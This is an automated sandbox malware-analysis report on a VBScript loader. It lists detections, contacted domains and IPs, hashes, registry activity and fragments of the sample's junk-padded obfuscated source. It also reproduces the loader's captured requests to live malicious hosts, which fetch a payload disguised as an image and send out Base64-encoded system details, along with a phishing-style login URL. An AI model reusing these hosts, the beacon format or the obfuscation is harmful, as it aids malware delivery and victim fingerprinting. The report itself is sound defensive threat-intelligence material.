MSG_226410.vbs
This report is generated from a file or URL submitted to this webservice on March 27th 2020 10:04:41 (UTC)
Guest System: Windows 7 32 bit, Professional, 6.1 (build 7601), Service Pack 1
Report generated by
Falcon Sandbox v8.30 © Hybrid Analysis
Incident Response
Risk Assessment
- Network Behavior
- Contacts 5 domains and 5 hosts. View all details
MITRE ATT&CK™ Techniques Detection
Indicators
Not all malicious and suspicious indicators are displayed. Get your own cloud service or the full version to view all details.
-
Malicious Indicators 4
-
External Systems
-
Detected Suricata Alert
- details
- Detected alert "ETPRO MALWARE Unk.VBSLoader Retrieving Payload" (SID: 2841137, Rev: 1, Severity: 1) categorized as "A Network Trojan was detected" (PUA/PUP/Adware)
- source
- Suricata Alerts
- relevance
- 10/10
-
Sample was identified as malicious by at least one Antivirus engine
- details
- 3/60 Antivirus vendors marked sample as malicious (5% detection rate)
- source
- External System
- relevance
- 8/10
-
Detected Suricata Alert
-
Network Related
-
Malicious artifacts seen in the context of a contacted host
- details
-
Found malicious artifacts related to "37.9.175.9": ...
URL: http://gdpronline.sk/staple/444444.png (AV positives: 3/76 scanned on 03/27/2020 01:25:13)
URL: http://gdpronline.sk/staple/444444.png?uid=TQBpAGMAcgBvAHMAbwBmAHQAIABXAGkAbgBkAG8AdwBzACAANwAgAFAAcgBvAGYAZQBzAHMAaQBvAG4AYQBsACAA (AV positives: 5/76 scanned on 03/26/2020 18:53:38)
URL: https://app.jtrbot.com/ (AV positives: 1/76 scanned on 03/26/2020 14:52:45)
URL: http://topfest.sk/misc/farbtastic/css/login/customer_center/customer-IDPP00C149/myaccount/signin (AV positives: 5/76 scanned on 03/26/2020 07:10:23)
URL: http://zeleneatrium.sk/media-o-nas/v-trnave-rastie-slovensky-unikat/engine1/style.css (AV positives: 1/76 scanned on 03/25/2020 15:16:10)
File SHA256: 72ec27bd0d959a1e6713d96b4e55c5a9b92ac6d1b5b5a4a8d5d1211422fcee57 (AV positives: 1/73 scanned on 03/09/2020 11:39:35)
File SHA256: 92bff682e991c90a5500a0eb271a435bc3dcbda30cd82a620151351f9c3ac23f (AV positives: 30/74 scanned on 01/02/2020 17:10:11)
File SHA256: bc48f37f3f29877d90cfbd99caf277460c625400f5984682c606a57ff0a62eb6 (AV positives: 32/73 scanned on 12/18/2019 14:21:05)
File SHA256: f4b2e4dcd3bc664b38e5de5783448b2d1c60469265d7609e6bc60139f8eb0c5b (Date: 12/18/2019 09:26:00)
File SHA256: 6f4ca7801ac1439bc13560e644c957e24a25159725920b74abf5bdc9898df475 (AV positives: 14/74 scanned on 12/09/2019 12:20:07)
File SHA256: 81e366b6105440fa9ca1304ea27ea5f00e4c9d5ca8b7f8ce4a5204b195fc1836 (Date: 11/20/2019 04:03:47)
File SHA256: d6e230c786755a00ea6d3886e556349c1f154eb9338b7f908f564dfe4a2486ce (Date: 11/20/2019 04:03:31)
File SHA256: a8c56d50c351156f03278bef850b74254fd9f71877c49ceb85355a36a8f93114 (Date: 11/20/2019 04:03:12)
File SHA256: 02eaf63fc74516b3dc235e4227fd79317b852c36b6828b5675db51881e20489d (Date: 11/20/2019 04:02:33)
File SHA256: e1e36b609ea094e304435ec4f82ef63c504e313aef9fbc26609b13e11d6fde98 (AV positives: 11/72 scanned on 11/14/2019 09:43:39) - source
- Network Traffic
- relevance
- 10/10
-
Malicious artifacts seen in the context of a contacted host
-
Hiding 1 Malicious Indicators
- All indicators are available only in the private webservice or standalone version
-
Suspicious Indicators 5
-
Anti-Reverse Engineering
-
Possibly checks for known debuggers/analysis tools
- details
-
"qqUxXdgIOCCafSmiIAqQvNgaI=Fix(qqUxXdgIOCCafSmiIAqQvNgaI)
NPdJpbGXDYurooVvVhbVmuYt=44
'headset apili farmscape conicity spirket attracted Emmalena discerner bangboard rhumba OSS mithan phlebalgia Mogador UG EAM impers stomach-achy enshrining Maluku Coblenz avarices outboards well-locked mispassion not-delivery Barcoo afflicter think-tank liftoffs acerous Burlison Garrisonism lexicology seasoners gowf striking frumpier catchwater superavit unjocund Molotov atabek unacademical branching spiks Martel unactual dogshore files coaters Dulcea voltammeter viscacha outgreen belly-blind photosynthate several-lobed Lanti adviso sorite cerebrasthenic Ironia tokening enticeable autocarist GSA three-pint uncourted Bakerstown advancers unreleasing montages Pro-irish imperialistic leekish mid-styled ariste couths aldermans irrepentance Rooney arango Gratiola Billjim Chao overvigorousness malonic hoondee deforciant self-boiled Acrasida ramifying anaematosis fredaine spirae light-of-love Xerus abort Judica Protoascales motivele" (Indicator: "ntice")
"ubber clinical variances griffonage dishexecontahedroid Joyann Blevins astrophel worble motherwort forequarter analgize hypopepsy ramoneur forsaker Jayhawker 'frithwork adenohypersthenia tripacks hippophobia decarbonylation Volga-baltaic arised mislain arrowhead metachromasis investigations bone-bred ever-fertile pyemic folletto presidents wily balsamation strong-willed estranging canreply overparty unreposing antithesism marshaless riverboat wool-producing unplow McCloud parasitologies Guerneville laryngofission swinged panhandlers overdignified triennials Cucujidae argentan Slemmer esterlin spilus wung-out ridgiest whir Caribal inattentivenesses rightnesses togaed OTEC glacier Monumbo Clevie gloried aloetical cuing aridity Child apprentices Ryurik Mulberry mump evangelium metagenic wartproof unpen Corrodentia lesseeship emulgence pineweed introinflection Aldo lymphoid Odelinda Yaakov Hasa consolement banlieue mezuzoth Acis thistled precontractive spiritoso incarnated aerially pathophysiologic unglittering g" (Indicator: "ntice")
"branchiate sounds carniferrin denticete dimethylcarbinol contemporised acculturationist carpostome phoniatry Bensky schoollike unitary color-testing noneconomy pepped pharmacosiderite snakes orthoepistic Stilesville Matty codline Vanorin unadherent jinjili Schlieffen Frey calibrated ascian Walls cousinage gristmill homelyn mischief-making consorter zeuglodontoid Choctaw pretraced yew-roofed aloma TOPS devil-ridden turbidities
IQFKjfsIwBckYQlCsbPnvHetXk=IQFKjfsIwBckYQlCsbPnvHetXk+GoUnHpVpnvzFNXaOHhkhLvrLF
cNlLNPOuajiIxCybgnxFm=IcwcYLltJQhJXLHLOISKFhAhJgP+cNlLNPOuajiIxCybgnxFm" (Indicator: "ntice")
"IcwcYLltJQhJXLHLOISKFhAhJgP=IcwcYLltJQhJXLHLOISKFhAhJgP+IQFKjfsIwBckYQlCsbPnvHetXk
'nontraversable flinchingly solid-seeming mezzotinted overpeer Alpinism metapore hypersuggestibly referrible angiorrhea smallcoal levelheadedly idyllia unpromiscuously Daphna preferentially Penderecki IGFET lymphadenome Albur wasteword gnawingly gallize bendays superterrestial postretirement truthlikeness deistical plate-collecting seminarcosis love-madness poltergeistism subconcave awhirl alreadiness lanternman repetatively capacious repatriation homocercality promulgating hygienists indocibility preparatory smiters red-eared Tagala Mittelmeer tonitrocirrus extractability well-forgotten wetters crow-toe Kimble venalize Elexa scoterythrous arolia unpartialness karvar doigt piquet summates saccharohumic semiforeign scotosis nonchurchgoing selenates apocrisiary Proberta lenticellate metatatical taxidermal overgrieve whelpless airplanist misascription froggery overdestructiveness soutage ectosphenotic unsulkily whappers entrepre" (Indicator: "ntice")
"ZERO_NUM nNiLmrtHtTndGRakMkiizkAyCV'amasesis wailer ECLSS cladding guaranteeship adios baresthesia velveting hunger-driven masculy tantric abrogated dark-rolling conduceability threaten Sig. sea-encircled ophthalmoscopy seminvariantive nitrogenisation thiopyran ultraroyalist avigate proinquiry trochate formicid NAPLPS sclere cheths tagrags latifolia hacksilber unfeudalized xanthite superdomineering flype reflectionless jacketless kethibh teagardeny Half-americanized pennywort tenuirostral composts deipnosophism sexagesimal cystofibroma apprenticement sulphite skin-spread batrachotoxin omphalotomy grammarless proproctor undergoing olive-skinned thin-peopled fremdly somatological ribbidge daimiate marqueterie sophomore tardies Pender quicksandy hypergols sojourned Afro-comb ornithogeographic Lexis Tabellariaceae cottonseeds crooking debone stalactite psychotherapist Kane hewed unadditional six-pounder topers tailwater reviviscent semiperviousness celom Bolshy soldierly toxinfection disapprovable sundries marqu" (Indicator: "ntice")
"ethocerus matronage extirpating abl. flabby Sinaloa curate planless Durbin apprenticeships hypersensitise stinkball islandman preevading maidin occidentals unextinguishableness winter-fattened unbereaven antistrophically Henka infiltrates recurrency hyperrealizing zingari unrubricated devolutionist unreal subcrystalline overpreoccupy unchauvinistic unlucky sheilas spermatiophore fiqh hauteurs Richella comping unforgetful executiveship isogon grayishness noncontinuous ill-humouredness loaminess Arcimboldi pleonastical checkless devoured unprofitableness 'steeliness polyoecy Tunker advancing nonobstructive BSAE foreclosures screechiness Suanne pairle outclerk linsangs Hahnert adsignify evangelistship cardosanto dermatozoonosis binucleate Lundberg vile-spirited nitta garde-du-corps masquers louringness bullnoses ground-hog listeners pushrods manuscriptal soiled bepen essoined air-conveying myrmecophyte Tiptonville beadhouse Pro-irishism sandheat semifluidity brooklike stratig kephalo- Ixiama resalvage stigmatism" (Indicator: "ntice")
"oKMGDOWZnJqMtLiLkUgyOfTkqwo=Sgn(UOptbXABFngejdbaQeLpzNGR)
UOptbXABFngejdbaQeLpzNGR=RGB(150,143,148)'intercentra rastafarianism pontificates carnages pillowwork monticoline garotted corone clericum Moarian well-maintained autochton boyang wagework trails well-thewed phallic laminariaceous lairdocracy sunken tylosis orphaning hell-born impersonalised existentialism constatations pinnatodentate necromania Kosti mashlam eversporting predamn cystatrophy muzzleloader pleiophyllous motricity beater Flaveria frigates throatroot Fahland previsit muktear Achaemenidae diamantoid verso philopogon polemizes cantankerous bedash artistdom unshieldable bissextus particularisation nonlogical sectarianizing kenoticism cayennes piassava enthroned Nebaioth Lux. Lamanite harlequinism blickie fivestones hepatomelanosis tendonitis saccharifying Pettit stabulation anticensorious spearer Pepito acoasma gleamingly brachium pupates forecastors rebating laparostict fixity gloriam exponentiations Balanchine journalising reshipment recros" (Indicator: "ntice")
"uHmXAFGKtGztbucEXMQLAeezFl=IecyIOEEBjGZvzcvqPuVt-IecyIOEEBjGZvzcvqPuVt
IecyIOEEBjGZvzcvqPuVt=CDZJyDiSnQcGNliqyFREXeNII-UOptbXABFngejdbaQeLpzNGR
'quillback nonencyclopedic charpoys fifer chromiferous miscarry Englis lats generic imbrute machine-sewed jockeylike preconfusedly swift-seeing Alarodian inculcated rerolls Turkicize fenced-in battler boltless sloven Fulda endoplasma annexer buzzword quasi-rebellious dolmen vincibly commend sublimeness pseudoartistically aldime blowfly stand-down oxidizers Fidelia Sigismundo Yemen anticephalalgic soothingness unround nonassimilability derri preference unimbezzled ossia upgazed well-like camphols espalier Lewert hook-bill Deseilligny rotta Mollies shoreman Die shavians unconquered cerebromalacia nubilate chokers Callipolis Tabulata Shiller rhagite relinquishments theatergoers bodyplate appled unfenestrated Antidorcas Nestorianism kinkier hammer-shaped taxistand black-a-vised reobserved secateurs bespoke cushion-footed nonsuspensive electrostereotype flukeless well-h" (Indicator: "ntice")
"RzbRHrPqCHIMounaNWRIkSnae=Abs(pBzkkHLRslMSXuBmKisAVduZG)'Wycliffite vinometer taxgathering inexpectedly skin-built unharmonize microzoan hepatotherapy fretsaw bucklum necropathy figeter axles subheading outtold dumbfounds Angostura Leander dunderheads presubscription morphological postcrural semigloss indan beneficential unapplying neologianism radiophysics heart-heaviness rebuff beguilingly unreadily Rich deuteroconid Un-tudor pseudoambidextrously enlaces double-leaded forblow originatively undercurrents place phytometric beauts Sabia calumniating geoscopy pothers fustigate antiscabious Godavari monergism scatomas Transteverine trustworthiest soft-shell quarterdecks bureau fragility Sallisaw Femmine anticeremonial isoionone scanstor coleopttera disincarceration Canis thaumatology misspacing transmigrators ibn-Rushd Kippy unpenetrative norimon reformandum foodstuffs acor raindrop stinkwort abscissin shahs phlogisticate cigaret indifferencies sack-sailed otherwheres stepfatherhood cossette auribromide Johannis" (Indicator: "ntice") - source
- File/Memory
- relevance
- 2/10
-
Possibly checks for known debuggers/analysis tools
-
External Systems
-
Found an IP/URL artifact that was identified as malicious by at least one reputation engine
- details
-
3/76 reputation engines marked "http://www.kitaair.com" as malicious (3% detection rate)
2/76 reputation engines marked "http://gdpronline.sk" as malicious (2% detection rate)
3/76 reputation engines marked "http://kitaair.com" as malicious (3% detection rate)
2/76 reputation engines marked "http://hotdsk.com" as malicious (2% detection rate) - source
- External System
- relevance
- 10/10
-
Found an IP/URL artifact that was identified as malicious by at least one reputation engine
-
Installation/Persistance
-
Executes a visual basic script
- details
- Process "wscript.exe" with commandline ""C:\MSG_226410.vbs"" (Show Process)
- source
- Monitored Target
- relevance
- 10/10
-
Loads the task scheduler COM API
- details
-
"wscript.exe" loaded module "%WINDIR%\System32\taskschd.dll" at 73C00000
"wscript.exe" loaded module "%WINDIR%\System32\taskschd.dll" at 023E0000 - source
- Loaded Module
- relevance
- 5/10
- ATT&CK ID
- T1168 (Show technique in the MITRE ATT&CK™ matrix)
-
Executes a visual basic script
-
Network Related
-
Sends traffic on typical HTTP outbound port, but without HTTP header
- details
-
TCP traffic to 173.249.60.219 on port 80 is sent without HTTP header
TCP traffic to 46.16.91.179 on port 80 is sent without HTTP header
TCP traffic to 46.16.91.179 on port 443 is sent without HTTP header
TCP traffic to 37.9.175.9 on port 80 is sent without HTTP header
TCP traffic to 77.104.140.85 on port 80 is sent without HTTP header - source
- Network Traffic
- relevance
- 5/10
-
Sends traffic on typical HTTP outbound port, but without HTTP header
-
Informative 14
-
General
-
Accesses Software Policy Settings
- details
-
"wscript.exe" (Path: "HKCU\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\CA"; Key: "")
"wscript.exe" (Path: "HKCU\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\CA\CERTIFICATES"; Key: "")
"wscript.exe" (Path: "HKCU\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\CA\CRLS"; Key: "")
"wscript.exe" (Path: "HKCU\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\CA\CTLS"; Key: "")
"wscript.exe" (Path: "HKLM\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\CA"; Key: "")
"wscript.exe" (Path: "HKLM\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\CA\CERTIFICATES"; Key: "")
"wscript.exe" (Path: "HKLM\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\CA\CRLS"; Key: "")
"wscript.exe" (Path: "HKLM\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\CA\CTLS"; Key: "")
"wscript.exe" (Path: "HKCU\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\DISALLOWED"; Key: "")
"wscript.exe" (Path: "HKCU\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\DISALLOWED\CERTIFICATES"; Key: "")
"wscript.exe" (Path: "HKCU\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\DISALLOWED\CRLS"; Key: "")
"wscript.exe" (Path: "HKCU\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\DISALLOWED\CTLS"; Key: "")
"wscript.exe" (Path: "HKLM\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\DISALLOWED"; Key: "")
"wscript.exe" (Path: "HKLM\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\DISALLOWED\CERTIFICATES"; Key: "")
"wscript.exe" (Path: "HKLM\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\DISALLOWED\CRLS"; Key: "")
"wscript.exe" (Path: "HKLM\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\DISALLOWED\CTLS"; Key: "")
"wscript.exe" (Path: "HKLM\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\ROOT"; Key: "")
"wscript.exe" (Path: "HKLM\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\ROOT\CERTIFICATES"; Key: "")
"wscript.exe" (Path: "HKLM\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\ROOT\CRLS"; Key: "")
"wscript.exe" (Path: "HKLM\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\ROOT\CTLS"; Key: "") - source
- Registry Access
- relevance
- 10/10
- ATT&CK ID
- T1012 (Show technique in the MITRE ATT&CK™ matrix)
-
Accesses System Certificates Settings
- details
-
"wscript.exe" (Path: "HKCU\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\MY"; Key: "")
"wscript.exe" (Path: "HKCU\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\CA"; Key: "")
"wscript.exe" (Path: "HKCU\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\CA\CERTIFICATES"; Key: "")
"wscript.exe" (Path: "HKCU\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\CA\CRLS"; Key: "")
"wscript.exe" (Path: "HKCU\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\CA\CTLS"; Key: "")
"wscript.exe" (Path: "HKLM\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\CA"; Key: "")
"wscript.exe" (Path: "HKLM\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\CA\CERTIFICATES"; Key: "")
"wscript.exe" (Path: "HKLM\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\CA\CRLS"; Key: "")
"wscript.exe" (Path: "HKLM\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\CA\CTLS"; Key: "")
"wscript.exe" (Path: "HKCU\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\DISALLOWED"; Key: "")
"wscript.exe" (Path: "HKCU\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\DISALLOWED\CERTIFICATES"; Key: "")
"wscript.exe" (Path: "HKCU\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\DISALLOWED\CRLS"; Key: "")
"wscript.exe" (Path: "HKCU\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\DISALLOWED\CTLS"; Key: "")
"wscript.exe" (Path: "HKLM\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\DISALLOWED"; Key: "")
"wscript.exe" (Path: "HKLM\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\DISALLOWED\CERTIFICATES"; Key: "")
"wscript.exe" (Path: "HKLM\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\DISALLOWED\CRLS"; Key: "") - source
- Registry Access
- relevance
- 10/10
- ATT&CK ID
- T1112 (Show technique in the MITRE ATT&CK™ matrix)
-
Contacts domains
- details
-
"hotdsk.com"
"kitaair.com"
"gdpronline.sk"
"a.8xcornwall.com"
"www.kitaair.com" - source
- Network Traffic
- relevance
- 1/10
-
Contacts server
- details
-
"173.249.60.219:80"
"46.16.91.179:80"
"46.16.91.179:443"
"37.9.175.9:80"
"77.104.140.85:80" - source
- Network Traffic
- relevance
- 1/10
-
Loads the .NET runtime environment
- details
- "wscript.exe" loaded module "%WINDIR%\assembly\NativeImages_v2.0.50727_32\mscorlib\9f895c66454577eff9c77442d0c84f71\mscorlib.ni.dll" at 652E0000
- source
- Loaded Module
-
Logged script engine calls
- details
-
"wscript.exe" called "Msxml2.DOMDocument.3.0.CreateObject" ...
"wscript.exe" called "ADODB.Stream.6.0.CreateObject" ...
"wscript.exe" called "WScript.Shell.1.CreateObject" ... - source
- API Call
- relevance
- 10/10
-
Overview of unique CLSIDs touched in registry
- details
-
"wscript.exe" touched "VB Script Language" (Path: "HKCU\CLSID\{B54F3741-5B07-11CF-A4B0-00AA004A55E8}")
"wscript.exe" touched "Constructor that allows hosts better control creating scriptlets" (Path: "HKCU\CLSID\{06290BD1-48AA-11D2-8432-006008C3FBFC}")
"wscript.exe" touched "XML DOM Document 3.0" (Path: "HKCR\SOFTWARE\CLASSES\CLSID\{F5078F32-C551-11D3-89B9-0000F81FE221}")
"wscript.exe" touched "ADODB.Stream" (Path: "HKCU\CLSID\{00000566-0000-0010-8000-00AA006D2EA4}\TREATAS")
"wscript.exe" touched "Multi Language Support" (Path: "HKCU\CLSID\{275C23E2-3747-11D0-9FEA-00AA003F8646}\TREATAS")
"wscript.exe" touched "Windows Script Host Shell Object" (Path: "HKCU\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}\TREATAS")
"wscript.exe" touched "Server XML HTTP 6.0" (Path: "HKCU\CLSID\{88D96A0B-F192-11D4-A65F-0040963251E5}\TREATAS")
"wscript.exe" touched "WinHttpRequest Component version 5.1" (Path: "HKCU\CLSID\{2087C2F4-2CEF-4953-A8AB-66779B670495}\TREATAS")
"wscript.exe" touched "Wbem Scripting Object Path" (Path: "HKCU\CLSID\{172BDDF8-CEEA-11D1-8B05-00600806D9B6}\TREATAS")
"wscript.exe" touched "WBEM Locator" (Path: "HKCU\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\TREATAS")
"wscript.exe" touched "WbemDefaultPathParser" (Path: "HKCU\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\TREATAS")
"wscript.exe" touched "Windows Management and Instrumentation" (Path: "HKCU\CLSID\{8BC3F05E-D86B-11D0-A075-00C04FB68820}\TREATAS")
"wscript.exe" touched "PSFactoryBuffer" (Path: "HKCU\CLSID\{7C857801-7381-11CF-884D-00AA004B2E24}\TREATAS")
"wscript.exe" touched "Microsoft WBEM (non)Standard Marshaling for IWbemServices" (Path: "HKCU\CLSID\{D68AF00A-29CB-43FA-8504-CE99A996D9EA}\TREATAS")
"wscript.exe" touched "Microsoft WBEM (non)Standard Marshaling for IEnumWbemClassObject" (Path: "HKCU\CLSID\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\TREATAS")
"wscript.exe" touched "System.Text.UnicodeEncoding" (Path: "HKCU\CLSID\{A0F5F5DC-337B-38D7-B1A3-FB1B95666BBF}\TREATAS")
"wscript.exe" touched "XML DOM Document" (Path: "HKCU\CLSID\{2933BF90-7B36-11D2-B20E-00C04F983E60}\TREATAS")
"wscript.exe" touched "Microsoft OLE DB Error Collection Service" (Path: "HKCU\CLSID\{C8B522CF-5CF3-11CE-ADE5-00AA0044773D}\TREATAS")
"wscript.exe" touched "ADO 6.0" (Path: "HKCU\CLSID\{0000051A-0000-0010-8000-00AA006D2EA4}\EXTENDEDERRORS")
"wscript.exe" touched "ADODB Error Lookup Service" (Path: "HKCU\CLSID\{00000542-0000-0010-8000-00AA006D2EA4}\TREATAS") - source
- Registry Access
- relevance
- 3/10
-
Accesses Software Policy Settings
-
Installation/Persistance
-
Touches files in the Windows directory
- details
-
"wscript.exe" touched file "%WINDIR%\System32\wscript.exe"
"wscript.exe" touched file "C:\Windows\Globalization\Sorting\SortDefault.nls"
"wscript.exe" touched file "C:\Windows\System32\en-US\KernelBase.dll.mui"
"wscript.exe" touched file "C:\Windows\System32\msxml3r.dll"
"wscript.exe" touched file "C:\Windows\System32\wshom.ocx"
"wscript.exe" touched file "C:\Windows\System32\msxml6r.dll"
"wscript.exe" touched file "C:\Windows\System32\wbem\wbemdisp.tlb"
"wscript.exe" touched file "C:\Windows\Microsoft.NET\Framework\v1.0.3705\clr.dll"
"wscript.exe" touched file "C:\Windows\Microsoft.NET\Framework\v1.0.3705\mscorwks.dll"
"wscript.exe" touched file "C:\Windows\Microsoft.NET\Framework\v1.1.4322\clr.dll"
"wscript.exe" touched file "C:\Windows\Microsoft.NET\Framework\v1.1.4322\mscorwks.dll"
"wscript.exe" touched file "C:\Windows\Microsoft.NET\Framework\v2.0.50727\clr.dll"
"wscript.exe" touched file "C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorwks.dll"
"wscript.exe" touched file "C:\Windows\Microsoft.NET\Framework\v4.0.30319\clr.dll"
"wscript.exe" touched file "C:\Windows\System32\WScript.exe.config"
"wscript.exe" touched file "C:\Windows\assembly\NativeImages_v2.0.50727_32\index34e.dat" - source
- API Call
- relevance
- 7/10
-
Touches files in the Windows directory
-
Network Related
-
Found potential URL in binary/memory
- details
-
Heuristic match: "hotdsk.com"
Heuristic match: "GET /staple/444444.png?uid=TQBpAGMAcgBvAHMAbwBmAHQAIABXAGkAbgBkAG8AdwBzACAANwAgAFAAcgBvAGYAZQBzAHMAaQBvAG4AYQBsACAA HTTP/1.1
Connection: Keep-Alive
Accept: */*
Accept-Language: en-us
User-Agent: Prada
Host: hotdsk.com"
Heuristic match: "kitaair.com"
Heuristic match: "GET /staple/444444.png?uid=TQBpAGMAcgBvAHMAbwBmAHQAIABXAGkAbgBkAG8AdwBzACAANwAgAFAAcgBvAGYAZQBzAHMAaQBvAG4AYQBsACAA HTTP/1.1
Connection: Keep-Alive
Accept: */*
Accept-Language: en-us
User-Agent: Prada
Host: kitaair.com"
Heuristic match: "gdpronline.sk"
Heuristic match: "GET /staple/444444.png?uid=TQBpAGMAcgBvAHMAbwBmAHQAIABXAGkAbgBkAG8AdwBzACAANwAgAFAAcgBvAGYAZQBzAHMAaQBvAG4AYQBsACAA HTTP/1.1
Connection: Keep-Alive
Accept: */*
Accept-Language: en-us
User-Agent: Prada
Host: gdpronline.sk"
Heuristic match: "a.8xcornwall.com"
Heuristic match: "GET /12891239.png?uid=TQBpAGMAcgBvAHMAbwBmAHQAIABXAGkAbgBkAG8AdwBzACAANwAgAFAAcgBvAGYAZQBzAHMAaQBvAG4AYQBsACAA HTTP/1.1
Connection: Keep-Alive
Accept: */*
Accept-Language: en-us
User-Agent: Prada
Host: a.8xcornwall.com"
Pattern match: "www.kitaair.com" - source
- File/Memory
- relevance
- 10/10
-
HTTP request contains Base64 encoded artifacts
- details
- "Microsoft Windows 7 Professional "
- source
- Network Traffic
- relevance
- 7/10
- ATT&CK ID
- T1132 (Show technique in the MITRE ATT&CK™ matrix)
-
Found potential URL in binary/memory
-
Spyware/Information Retrieval
-
Found a reference to a known community page
- details
-
"NqPpoScocTyyCDBVhGRdnvLAe=Cos(NqPpoScocTyyCDBVhGRdnvLAe)'plagiarised mollycoddlers bubble-and-squeak Oestrelata well-noted shaft-straightener quezals admrx RCN colonises Pelpel curialism inconvinced balbuties pilliver inkish perceptual purposelessness onomastical Coelentera hematology labiovelarisation postelemental Pulvinaria musjids hand-fire homemakers viridian sorrow-furrowed sannyasi paganism chroniclers Cercopidae asquint tensegrity salband ice-skate cutter-down thoroughpin splenetic Anti-aristotelian sugarcoats Bricker scissorbill kernelless Olethea afterfruits knoller curara squishes atelestite subzones nonintermission metasilicic napron impatience moor-hen gun-deck Ebionitism twice-witnessed reperusal muktuk nightertale weaselly tumidily trilaterality Pyrrhic nondynamic Trans-tiberine dispunct inquisitor specialty in-law oceanographical emunctory disgig Nov. calcanea forcement undertruss unclever hotelward dormeuse unhelved culmination Trochozoa speise unsailorlike gagman twitterboned Alesandrini de" (Indicator: "twitter")
"pogeny 9-point Niklaus preromanticism skated vituperatively uncondoled necropolis virescence rhesian Baldomero cacophonous Viareggio problems winy Pelomedusa esthesiometry domesticized ulcerate Dirk allotropies abduction Novgorod twittering puisnes rufflier impofo coining unexterritoriality immunotherapies perjurement chiffonnieres enkindling vivisectionist raduliform unpracticability kotwali Shambaugh staggerer kidneylipped bataleur dichromatism Ilpirra imputrid holoquinoid pleats violature assertible runtishly unexchangeabness jingoed stateless self-judgement Bardolino Warners clay-colored imperceivableness endeavors brownier selaginellaceous Resa Amador Palesman short-staple ergots closefitting extracommunity bourgeoises exaggeratingly unseduceability Italianist infeudation methodized resecure" (Indicator: "twitter")
"gley Serapeums picquet milkiness Keeseville hypertoxicity odium thunder-breathing gerocomical nabber Kaitlin unstringently drainers breviger antiliberals well-favoredness Marcionism propagating uneconomical tetraplous rung nerved thick-barked Epicurize hippocerf peristyle warwickite coni conirostral ramiform monogenean overrighteously Iodamoeba amentiferous euphrasies unnumerical acicular hairbird hanksite Emberiza predeserved transponder primoprimitive pombe Assaracus portionally Ioskeha Pithecolobium twittering Hookerton rabbiters bottle-washer re-leasing alburnum overcontributing sinuous Tillaeastrum Rori prewar amniorrhea vraicking pre-encourage maintopmen dysfunctional Bradfordsville dead-arm supernaculum occasionality overpuff pogroms oozing caliperer smart-stinging furcates untheistical keratose disproves cazique Longo Rey compellably secluded shlump overheating MFH excommunicated lavendered citharoedic Squalida stutteringly babishly wingfish salet unhallucinated 'Peg paraphilia Atkinson flintlike debo" (Indicator: "twitter")
"'meterman ungiddy recordable carbonometer muckmidden unsageness jabalina radioactively gymnasisia tobaccoroot nestle-cock agranulocytosis refuelled revue concertstck Stymphalides ungossiping precreative gucki deflationary dragsawing superconformableness Chamblee motorings mumsy psoae endiadem settos collectors uncompassionating caustified preutilizing regalian photogeologic twice-discovered coiffeuses Eucirripedia Diatomaceae pseudocoelom hags scabinus repetitivenesses amperage phylography stopple prebenefited dugs uneasier unfarming forewarnings cocuswood threadflower pretty libellulid wawa soldier-mad weets bedown Attical comped bote Ashville viceroyal sirkeer hypomanic skinflint fortyish photodisintegration unblessedness interwork physophora oaf Leatherstocking fire-bearing brislings liturgist preimposed spinels ephippia pluriguttulate twitteringly pantrymen electrodes ared implicational untempestuously urgently narrower medico moghul undelightedly undrunk brave-sensed Aramu Koprino Wasatch cylindrodendr" (Indicator: "twitter")
